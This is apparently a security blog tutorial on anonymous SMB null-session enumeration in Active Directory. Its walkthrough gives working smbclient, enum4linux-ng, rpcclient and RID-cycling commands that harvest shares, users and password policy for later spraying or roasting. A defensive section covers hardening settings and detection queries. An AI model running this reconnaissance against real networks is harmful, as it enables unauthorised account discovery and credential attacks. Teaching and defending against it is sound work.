SMB Enumeration and Null Session Exploitation

Active Directory
2026.05.16
Time it takes to read this article 5 minutes.

Introduction / Overview

SMB (Server Message Block) is one of the richest enumeration surfaces in any Active Directory environment. Before you ever touch credentials, a well-configured (or misconfigured) SMB stack can leak users, groups, shares, password policies, and the domain SID. In this article you will learn how to systematically enumerate SMB, when and why null sessions still work, and how to chain enum4linux-ng, smbclient, rpcclient, and RID cycling into a coherent recon workflow. We close with an equally weighted Blue Team section so defenders can shut these techniques down.

Legal / Ethical Disclaimer: Everything below is for education and for authorized security testing only — systems you own or have explicit, written permission to test. Unauthorized scanning or access is illegal in most jurisdictions. Do not run these commands against assets you do not control.

How it works / Background

A null session is an anonymous, unauthenticated SMB connection — you authenticate with an empty username and empty password. Historically, Windows allowed anonymous clients to query the IPC$ share and reach named pipes such as \PIPE\lsarpc, \PIPE\samr, and \PIPE\srvsvc. Through those MS-RPC interfaces (the LSAR, SAMR, and SRVSVC protocols), an anonymous caller could enumerate users, groups, and shares.

Two registry values govern this on Windows:

  • RestrictAnonymous (HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
  • RestrictAnonymousSAM and EveryoneIncludesAnonymous

Modern Windows (2008+ / Samba with restrict anonymous) tightens this, but null sessions still appear constantly on legacy Domain Controllers, NAS appliances, printers, and misconfigured Samba servers.

RID cycling exploits the structure of Windows security identifiers. Every domain account's SID is <domain SID>-<RID>. Well-known RIDs are fixed: 500 is the built-in Administrator, 512 is Domain Admins. By resolving the domain SID once and then iterating RIDs (typically 500–10000+), you can translate each SID back to an account name via the LSAR LsarLookupSids call — even when bulk user enumeration is blocked.

Prerequisites / Lab setup

You need a Linux attack box with the Samba client suite and enum4linux-ng:

sudo apt update
sudo apt install -y smbclient samba-common-bin
pipx install enum4linux-ng        # or: git clone https://github.com/cddmp/enum4linux-ng

For a lab target, any Windows Server DC with RestrictAnonymous=0, or a Samba server configured with server min protocol = NT1 and a guest-friendly share, reproduces the behavior nicely. Identify SMB hosts first:

nmap -p139,445 --open -sV 10.10.10.0/24
nmap --script "smb-protocols,smb-security-mode,smb2-security-mode" -p445 10.10.10.5

smb-security-mode tells you whether message signing is required — a key data point for relay attacks later.

Attack walkthrough / PoC

1. Confirm the null session

Start with smbclient. The -N flag suppresses the password prompt (null auth), and -L lists shares:

smbclient -N -L //10.10.10.5/
# Or explicitly:
smbclient -N -U '' -L //10.10.10.5/

If you get a share list back instead of NT_STATUS_ACCESS_DENIED, anonymous access is allowed. Connect to a readable share:

smbclient -N //10.10.10.5/Public
smb: \> ls
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

2. Broad sweep with enum4linux-ng

enum4linux-ng is the modern, actively maintained rewrite of enum4linux. It orchestrates smbclient, rpcclient, and nmblookup and emits structured YAML/JSON. The -A flag runs all checks:

enum4linux-ng -A 10.10.10.5
# Useful focused runs:
enum4linux-ng -U -G -S -P 10.10.10.5      # users, groups, shares, password policy
enum4linux-ng -R 10.10.10.5               # RID cycling
enum4linux-ng -A -oJ result 10.10.10.5    # write result.json

Pay attention to the password policy output (-P): lockout threshold and minimum password length directly inform whether you can safely password-spray afterward. See also Password Spraying in Active Directory.

3. Manual RPC enumeration with rpcclient

rpcclient gives you surgical control over the MS-RPC calls under the hood. Open a null session:

rpcclient -U '' -N 10.10.10.5

Then issue MS-RPC commands interactively:

rpcclient $> srvinfo                 # OS version / server type
rpcclient $> enumdomusers            # SAMR: list users
rpcclient $> enumdomgroups           # list groups
rpcclient $> querydominfo            # domain name, server role
rpcclient $> lsaquery               # resolve the domain SID
rpcclient $> queryuser 0x1f4         # detail for RID 500 (Administrator)
rpcclient $> getdompwinfo            # password policy

lsaquery returns the domain SID, e.g. S-1-5-21-1004336348-1177238915-682003330. That SID is the seed for RID cycling.

4. RID cycling by hand

Even when enumdomusers is blocked, lookupsids (the LSAR LsarLookupSids call) often is not. Iterate RIDs and resolve names:

for rid in $(seq 500 1100); do
  rpcclient -U '' -N 10.10.10.5 \
    -c "lookupsids S-1-5-21-1004336348-1177238915-682003330-$rid" \
    2>/dev/null | grep -v "S-0-0\|UNKNOWN"
done

A resolved line looks like:

S-1-5-21-1004336348-1177238915-682003330-500 CORP\Administrator (1)
S-1-5-21-1004336348-1177238915-682003330-512 CORP\Domain Admins (2)

The trailing (1) means a user account, (2) a group. enum4linux-ng -R and impacket-lookupsid CORP/'anonymous'@10.10.10.5 automate exactly this loop. The resulting user list feeds directly into AS-REP roasting or Kerberoasting once you confirm valid names.

5. Pull policy and pivot

With a username list in hand, validate accounts and harvest more policy detail, then move toward credentialed enumeration (BloodHound, LDAP). Null-session recon is the on-ramp, not the destination.

Mermaid diagram

SMB Enumeration and Null Session Exploitation diagram 1

Text fallback: discover an SMB host, test for an anonymous null session, list shares, resolve the domain SID, enumerate users/groups, fall back to RID cycling when bulk enumeration is blocked, then use the harvested list and password policy for spraying or roasting.

Detection & Defense (Blue Team)

Anonymous SMB enumeration maps to MITRE ATT&CK T1087 (Account Discovery), T1135 (Network Share Discovery), and T1018 (Remote System Discovery). Treat the following as a baseline hardening checklist.

1. Disable anonymous access. On Windows, enforce via Group Policy (Security Options):

  • Network access: Do not allow anonymous enumeration of SAM accountsEnabled (sets RestrictAnonymousSAM=1).
  • Network access: Do not allow anonymous enumeration of SAM accounts and sharesEnabled (sets RestrictAnonymous=1).
  • Network access: Let Everyone permissions apply to anonymous usersDisabled (EveryoneIncludesAnonymous=0).
  • Network access: Restrict anonymous access to Named Pipes and SharesEnabled.
# Verify current values
Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' |
  Select-Object RestrictAnonymous, RestrictAnonymousSAM, EveryoneIncludesAnonymous

2. Kill SMBv1 and require signing. SMBv1 (NT1) enables the worst legacy behavior and CVE-2017-0144 (EternalBlue). Remove it and require signing to blunt relay attacks:

Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Set-SmbServerConfiguration -RequireSecuritySigning $true -EnableSecuritySigning $true
Set-SmbServerConfiguration -EnableSMB1Protocol $false

3. Harden Samba on Linux/NAS: set restrict anonymous = 2, server min protocol = SMB2_10 (or higher), avoid map to guest = Bad User, and never set guest ok = yes on sensitive shares.

4. Detect the behavior. Watch for:

  • Event ID 5140 / 5145 (share access auditing) where the account is ANONYMOUS LOGON.
  • Event ID 4624 Logon Type 3 with account name ANONYMOUS LOGON.
  • A single source hitting IPC$ plus a rapid burst of LsarLookupSids / SAMR calls — the signature of RID cycling. Many EDRs flag sequential SID lookups.
# Splunk-style hunt
EventCode=4624 Logon_Type=3 Account_Name="ANONYMOUS LOGON"
| stats count by Source_Network_Address, dest
| where count > 20

5. Network controls. Block 139/445 at the perimeter, segment DCs, and restrict SMB to management subnets. Honeypot shares with alerting catch enumeration early.

Conclusion

Null sessions are a textbook example of "old but not dead." A single anonymous bind can hand an attacker the domain SID, a full user list via RID cycling, the password policy, and a foothold for spraying or roasting — all without a credential. The defenses, however, are equally well understood: disable anonymous enumeration, remove SMBv1, require signing, and audit ANONYMOUS LOGON access. Enumeration discipline wins on both sides of the engagement.

References

Comments

Copied title and URL